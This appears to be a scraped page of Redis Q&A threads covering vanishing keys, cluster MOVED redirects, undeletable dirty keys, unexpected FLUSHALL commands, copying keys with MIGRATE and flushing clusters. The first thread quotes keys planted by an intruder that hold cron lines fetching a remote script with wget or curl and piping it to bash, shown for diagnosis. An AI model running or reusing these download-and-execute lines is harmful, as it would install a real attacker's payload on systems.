My redis server loses keys every few minutes - redis

My redis server loses keys every few minutes.
This is so wired and i cannot find the reason of this problem.
I was trying to keep my keys with expireat option, but expire and expireat options are ignored after few minutes, all keys are gone and two wired keys are added, "weaponsZ" , "weaponsX".
I don't know how that wired keys are existed in my redis.
Please help, I think that I am gonna crazy.
This is my environment. [OS : Ubuntu 16.04.5 64bit, Redis : 4.0.10, GPU : Nvidia 1080 Ti, Tensorflow 1.0, CUDA 8]
127.0.0.1:6379> set 'a' 1
OK
127.0.0.1:6379> expireat 'a' 1637309179
(integer) 1
$ redis-cli info
...
db0:keys=1,expires=1,avg_ttl=99994268099
(after few minutes)
$ redis-cli
127.0.0.1:6379> KEYS *
1) "weaponZ"
2) "weaponX"
127.0.0.1:6379> get "weaponZ"
"\n*/7 * * * * wget -q -O- https://pixeldra.in/api/download/m5YEMO --no-check-certificate | bash\n"
127.0.0.1:6379> get "weaponX"
"\n*/5 * * * * curl -fsSLk https://pixeldra.in/api/download/m5YEMO | bash\n"

Your server is being accessed by a nefarious party in an attempt to gain access to its resources. You should burn the server, and set a new one up with a password if it is connected to the outside world.

Related

redis-cli --pipe yields MOVED errors when bulk uploading to Elasticache with cluster-mode enabled

I am trying to use redis-cli --pipe to bulk upload some commands to my AWS Elasticache for redis cluster. The commands come from parsing a file via a custom awk command, which helps generate some HSET commands. The awk command is in a custom shell script. When my Elasticache for redis server had cluster-mode disabled, doing something like the following worked like a charm:
sh script_containing_awk.sh $FILE_TO_PARSE | redis-cli -h <Primary_endpoint> -p <port> --tls --cacert <path/to/cert> --pipe
Due to an internal project requirement, the Elasticache for Redis server has been re-created with cluster-mode enabled, and hence I am adding the -c flag to the above command to specify as such.
I see the following results when trying to work with my Elasticache for Redis server with cluster-mode enabled:
I can connect to the cluster via the configuration endpoint no problem!
Single command uploads work (i.e: redis-cli -h <config_endpoint> -p <port> -c --tls --cacert <path/to/certs> SET key value)
It would be extremely convenient to just pipe output from my script to the cli:
sh script_containing_awk.sh $FILE_TO_PARSE | redis-cli -h <config_endpoint> -p <port> -c --tls --cacert <path/to/cert> --pipe
but adding the --pipe flag results in "MOVED" errors.
I have tried modifying the script to include {} (ex: HSET {user1}:hash field1 val1 field2 val2 ... brackets to try to force keys to the same CLUSTER SLOTS, but I still get the "MOVED" errors and I am attempting to bulk upload millions of keys so I don't think they would all fit in the same slot anyway.
Does anyone have experience getting --pipe to work with cluster-mode enabled Redis/Elasticache?
Thanks!
I am sure you understand that the core difference between Cluster Mode Disabled and Cluster Mode Enabled is that there is a split in your total Key slots.
Just to put in context;
CMD - Let's say we have 4 node cluster with 1 Primary and 3 Replicas.
if we have 100 key slots -
All the 100 key slots will be there in all the nodes. 3 of them will serve Read only commands and 1 of the node will serve all the commands.
CME - Let's say we have 4 nodes split in 2 shards - 1 replica and 1 primary each.
We can look at them as logical sub-clusters ie. they will have different sets of key-slots. Ideally a 50-50 split.
Now, the MOVED message is not necessarily an error.
When you connect to the configuration endpoint, by default you are being connected with one of the primary nodes (chosen at random, at first).
when you make a command, the client sends that command and the primary node decides if it has the correct hash-slot to serve that command.
As explained here, if the node does not have the hash-slot that your client is looking for, it will redirect you with a MOVED message.
So, I would assume MOVED messages are somewhat expected with CME clusters.

Keys in Redis cluster cannot be deleted (and have empty value)

We have a Redis cluster (3 master, 3 slave) and are seeing a large number of keys on one of the master nodes (and related slaves) which appear to be empty and cannot be deleted.
If I connect to the master node which has a large number of entries (as determined by DBSIZE), I can SCAN for and see the keys:
--> redis-cli -h 192.168.100.81 -p 6381
192.168.100.81:6381> scan 0 match mykey-* count 10
1) "2359296"
2) 1) "mykey-1be333a7"
2) "mykey-e85a9d31"
3) "mykey-d9162eff"
4) "mykey-41d12fd8"
5) "mykey-a6e755d3"
6) "mykey-c2aa1eaa"
7) "mykey-c0597cac"
8) "mykey-10e69376"
9) "mykey-7263aef0"
10) "mykey-7fa9de50"
However, if I try and GET the value of a key, it shows it has moved:
192.168.100.81:6381> get mykey-1be333a7
(error) MOVED 8301 192.168.3.107:6380
If I connect to the node to which the key has moved, I am not able to GET or DEL the value:
--> redis-cli -h 192.168.3.107 -p 6380
192.168.3.107:6380> get mykey-1be333a7
(nil)
192.168.3.107:6380> del mykey-1be333a7
(integer) 0
I am also unable to GET or DEL the value using the cluster (-c) flag for redis-cli:
--> redis-cli -h 192.168.100.81 -p 6381 -c get mykey-1be333a7
(nil)
--> redis-cli -h 192.168.100.81 -p 6381 -c del mykey-1be333a7
(integer) 0
--> redis-cli -h 192.168.3.107 -p 6380 -c get mykey-1be333a7
(nil)
--> redis-cli -h 192.168.3.107 -p 6380 -c del mykey-1be333a7
(integer) 0
What can I do to remove these types of keys?
Interesting question!
How to reproduce the problem
The following is a scenario that will reproduce your problem:
You create a standalone Redis instance, and set some data into it. However, one day, you configure this standalone Redis as a member of a Redis Cluster, without flushing the old data or moving the old data to the right node of the cluster. Let's call these data as dirty data.
In this scenario, you can SCAN all keys on this instance, including the dirty data. However, you cannot read or write these dirty data, since your Redis is in cluster mode, it will redirect your request to the right node, which doesn't have such data.
How to solve the problem
In order to remove these dirty data, you should reconfigure your Redis instance into standalone mode, i.e. cluster-enabled no, and delete dirty data in standalone mode.
Then you can make it join the cluster again.

redis removes key before expire time and memory limit

I've installed redis in CentOS7 with
yum install redis
I used redis-cli to check current memory, but redis was using only 0.1% of allocated memory.
# Memory
used_memory:1068640
used_memory_human:1.02M
maxmemory:1000000000
maxmemory_human:953.67M
maxmemory_policy:noeviction
Keys are inserted every 1 minute, about 3kb.
And I'm inserting data in python redis module.
redis_connection.set(key, value, timedelta(days=2))
The keys/values are inserted well, but redis removes key before 2 days.
ttl <key> command shows me 172797(about 2 days)
What configuration do I have to change to prevent removing keys before expire time?
After monitoring in redis-cli monitor, I've found that someone is sending "FLUSHALL" commands.
So, I changed my redis port(default 6379 -> other) and added rename-command FLUSHALL <rename_flushall> and it worked.

Copying all keys in Redis database using MIGRATE

Is it possible to copy all keys from one Redis instance to another remote instance using MIGRATE? I've tried COPY, REPLACE and KEYS without any luck. Each time I get a NOKEY response. If I use any of the MIGRATE commands with a single key it works.
Examples:
MIGRATE my.redis 6379 "*" 0 5000 REPLACE // NOKEY
MIGRATE my.redis 6379 "*" 0 5000 COPY // NOKEY
MIGRATE my.redis 6379 "" 0 5000 KEYS * // NOKEY
MIGRATE my.redis 6379 "" 0 5000 KEYS test // OK
This is an improvement on the answer provided by #ezain since I am unable to post comments. The command uses the correct redis syntax for processing batches of keys, but the arguments to xargs result in the command being called once for every key instead of just once with all the keys included (which means it'll take much more time to complete than is necessary). The following will be much faster in all cases:
redis-cli --raw KEYS '*' | xargs redis-cli MIGRATE my.redis 6379 "" 0 5000 KEYS
If the destination is password protected:
redis-cli --raw KEYS '*' | xargs redis-cli MIGRATE my.redis 6379 "" 0 5000 AUTH password-here KEYS
try run in your shell
redis-cli keys '*' | xargs -I '{}' redis-cli migrate my.redis 6379 "" 0 5000 KEYS '{}'
For a big DBs with a lot of keys it's better to use --scan instead of keys, to avoid Redis lock on KEYS command:
redis-cli --scan | xargs redis-cli MIGRATE my.redis 6379 "" 0 5000 KEYS
Not really related to the question, but in case someone will need it: Redis does not support MIGRATE with a password before 3.0. After 3.0, you can add AUTH parameter to check the permission:
MIGRATE 192.168.0.33 6379 "" 0 5000 AUTH mypassword KEYS user:{info}:age
If you are running on non-managed¹ redis instances, the most ideal way would probably to run the target instance as a replica temporarly and then disable (after all data is copied) the replication.
see the REPLICAOF command in redis. how to apply it (all commands on the target instance):
initiate the replication: $ replicaof source_hostname_or_ip source_port
after everything is done: $ replicaof no one
If you can't use this command¹ then you can try this script on the digital ocean blog: https://www.digitalocean.com/community/tutorials/how-to-migrate-redis-data-to-a-digitalocean-managed-database#step-3-%E2%80%94-building-the-migration-script
################
¹ - managed services often restrict the usage of this command see here or here.
I'm not advocating using this, but I tried all of these examples, and many others and did not work. I ended up doing it myself in PHP, so maybe this will help someone else who is stuck.
<?php
$redisSource = new Redis();
$redisSource->connect('1.2.3.4', 6379);
$redisSource->auth('password');
$redisTarget = new Redis();
$redisTarget->connect('127.0.0.1', 6379);
foreach($redisSource->keys('*') as $key) {
$redisTarget->set($key, $redisSource->get($key));
}

how can I flush all redis nodes through predis?

I am trying to test my cache was implemented with redis clustering (cluster by server not client).
I have to flush redis every time I run a unit test.
when I try to run flushdb command I got this error:
Cannot use 'FLUSHDB' with redis-cluster.
it seems that I can run flushdb command in cluster mode only when I set the slot but I do not know how to do it. (I have overridden redis wrapper of laravel so laravel is not the case If you learn me how to use predis I can adopt it with laravel)
For deleting by pattern:
redis-cli --raw keys "$PATTERN" | xargs redis-cli del
for example:
redis-cli KEYS "prefix:*" | xargs redis-cli DEL
For deleting all keys from one db:
redis-cli flushdb
For deleting all keys from all dbs:
redis-cli flushall
For cluster mode you need to use this bash script:
https://gist.github.com/yaud/85e0382d26c189bdf84f0297cd54f479
to remove all nodes from master nodes (slave nodes will be synced)